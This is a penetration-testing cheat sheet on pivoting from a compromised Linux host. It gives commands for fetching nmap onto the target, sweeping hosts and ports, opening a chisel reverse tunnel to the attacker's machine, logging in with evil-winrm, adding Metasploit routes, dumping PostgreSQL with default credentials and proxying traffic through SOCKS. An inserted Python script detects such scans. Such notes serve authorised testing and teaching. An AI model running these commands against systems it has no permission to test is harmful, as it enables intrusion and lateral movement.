# Pivoting in Linux

Using access obtained on one machine to exploit another machine deeper in the network.

### Enumerate Network in Remote Machine

After gaining access to the remote machine, we can enumerate it for other reachable networks.\
If the target machine does not have **`nmap`**, we can first upload a static binary to it.

```shellscript
# Linux 64-bit
wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap
```

When we're ready, we investigate the network as follows.

```shellscript
# ARP cache
arp -a

# Network hosts, ip addresses
cat /etc/hosts
cat /etc/resolv.conf
nmcli dev show

# Network ranges
nmap 10.0.0.1-255
nmap 172.17.0.1-255
for i in {1..255}; do (ping -c 1 10.0.0.${i} | grep "bytes from" &); done

# Port scan
nmap 10.0.0.2
nmap 172.17.0.2
for i in {1..65535}; do (echo > /dev/tcp/172.17.0.2/$i) >/dev/null 2>&1 && echo $i is open; done
```
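The ping sweep and `/dev/tcp` loops above are noisy from a network-monitoring point of view. As an added example (not part of the original notes), here is a small detector that flags those two patterns in connection records; the record format, hosts, timestamps and thresholds are all constructed assumptions for this example.

```python
from collections import defaultdict

# Detection thresholds (assumptions for this example).
WINDOW_SEC = 60             # records are bucketed into fixed windows of this size
SWEEP_HOST_THRESHOLD = 20   # distinct ICMP destinations from one source per window
SCAN_PORT_THRESHOLD = 50    # distinct TCP ports tried on one destination per window


def parse_line(line):
    """Parse a constructed record '<epoch> <proto> <src> <dst> <dport>' ('-' = no port)."""
    ts, proto, src, dst, dport = line.split()
    return int(ts), proto, src, dst, (None if dport == "-" else int(dport))


def detect(lines):
    """Return (src, kind, target, count) alerts for host sweeps and port scans."""
    icmp_hosts = defaultdict(set)   # (src, window) -> set of dst hosts
    tcp_ports = defaultdict(set)    # (src, dst, window) -> set of dst ports
    for line in lines:
        ts, proto, src, dst, dport = parse_line(line)
        win = ts // WINDOW_SEC
        if proto == "icmp":
            icmp_hosts[(src, win)].add(dst)
        elif proto == "tcp" and dport is not None:
            tcp_ports[(src, dst, win)].add(dport)
    alerts = []
    for (src, _win), hosts in icmp_hosts.items():
        if len(hosts) >= SWEEP_HOST_THRESHOLD:
            alerts.append((src, "host-sweep", "icmp", len(hosts)))
    for (src, dst, _win), ports in tcp_ports.items():
        if len(ports) >= SCAN_PORT_THRESHOLD:
            alerts.append((src, "port-scan", dst, len(ports)))
    # Caveat: fixed buckets can split a slow scan across two windows; use a
    # sliding window or lower thresholds if the loops are throttled.
    return alerts


def constructed_records():
    """Constructed sample: 10.0.0.50 pings 10.0.0.1-30, then tries TCP ports 1-80
    on 172.17.0.2; 10.0.0.7 is ordinary client traffic and must not be flagged."""
    recs = [f"{1020 + i} icmp 10.0.0.50 10.0.0.{i} -" for i in range(1, 31)]
    recs += [f"{1100 + p // 10} tcp 10.0.0.50 172.17.0.2 {p}" for p in range(1, 81)]
    recs += ["1005 tcp 10.0.0.7 172.17.0.2 443",
             "1006 tcp 10.0.0.7 172.17.0.2 80",
             "1007 icmp 10.0.0.7 10.0.0.1 -"]
    return recs


if __name__ == "__main__":
    for alert in detect(constructed_records()):
        print(alert)
```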

### Access to Not Directly Accessible Host

If we find a host and port that we cannot reach directly from our local machine, we can get there with reverse port forwarding.\
For example, assume that from the remote machine we discovered another host **172.16.22.2** with port **5985** open, and we want to connect to that port. Execute the following commands on each machine.

```shellscript
# In local machine
chisel server -p 9999 --reverse

# In remote machine
# replace "10.0.0.1" with your local ip address
chisel client 10.0.0.1:9999 R:5985:172.16.22.2:5985
```

Now we can reach `172.16.22.2:5985` from the local machine through the forwarded port on localhost, as follows.

```shellscript
nmap -p 5985 localhost

# Result
PORT     STATE SERVICE
5985/tcp open  wsman
```

After that, we can connect to the service through the forwarded port.

```shellscript
evil-winrm -u username -p password -i localhost
```

For details, please refer to [Port Forwarding with Chisel](https://hamcodes.gitbook.io/hackersnotes/pivoting-lateral-movement/pivoting/chisel).

### Basic Flow with Metasploit, Meterpreter

```shellscript
msfconsole
msf> use auxiliary/...
msf> run

# Background the shell session obtained by the module
msf> background

# Upgrade the latest session (-1) to meterpreter
msf> sessions -u -1
# Interact with the latest session (meterpreter)
msf> sessions -i -1

# Resolve a hostname seen on the remote machine to an ip address
meterpreter> resolve <hostname>

# Background the meterpreter session
msf> background

# Add a route to 172.28.101.51/32 (the ip printed by "resolve") via the latest opened session (-1)
msf> route add 172.28.101.51/32 -1

# Add a route to another destination, 172.17.0.1/32 (e.g. written in /.dockerenv), via the latest opened session
msf> route add 172.17.0.1/32 -1

# Print the routing table
msf> route print
```

After modifying the routing table, modules run from msfconsole can reach the routed IP (e.g. 172.28.101.51) through the session. For example:

```shellscript
# PostgreSQL
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> run postgres://postgres:postgres@172.28.101.51/postgres

msf> use auxiliary/admin/postgres/postgres_sql
msf> run postgres://postgres:postgres@172.28.101.51/postgres sql='select * from <table>'
```

* **Socks Proxy**

  A SOCKS proxy is an intermediate server that relays network traffic between two machines; here Metasploit runs one locally and forwards the traffic over the routed session.

  ```shellscript
  msfconsole
  msf> use auxiliary/server/socks_proxy
  msf> run srvhost=127.0.0.1 srvport=9050 version=4a

  # Check if the socks proxy is running as a background job.
  msf> jobs
  # Stop the socks proxy
  msf> jobs -k <job-id>
  ```

  After that, you can point tools such as curl or proxychains at `localhost:9050`. proxychains uses the proxy listed in its `proxychains.conf`; the default entry is `socks4 127.0.0.1 9050`, which matches the port above.

  ```shellscript
  curl --proxy socks4a://localhost:9050 http://172.17.0.1 -v

  proxychains nmap 172.17.0.1
  proxychains ssh <user>@172.17.0.1
  ```
